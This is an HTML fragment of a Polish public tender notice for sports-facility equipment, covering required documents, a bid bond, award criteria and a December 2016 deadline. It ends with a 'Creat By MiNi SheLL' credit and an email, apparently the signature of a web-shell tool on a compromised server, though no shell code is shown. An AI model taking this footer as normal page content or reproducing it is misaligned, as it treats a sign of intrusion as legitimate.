           Dokumenty, o których mowa w pkt.8.3 lit.a  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty, o których mowa w pkt. 8.3.lit. b powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />oświadczenie wykonawcy, że spełnia warunki określone  art. 22 ust.1b ustawy  na formularzu oświadczenia stanowiącym załącznik nr 2 do SIWZ,
   wykaz wykonanych w okresie ostatnich trzech lat dostaw, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie tj. co najmniej jednej dostawy wyposażenia obiektu sportowego o wartości min. 300.000,00  zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączenia dowodów określających, czy te dostawy zostały wykonane należycie, wg załącznika nr 5 do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />10000 zł</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena dostawy</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/12/2016, godzina: 08:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com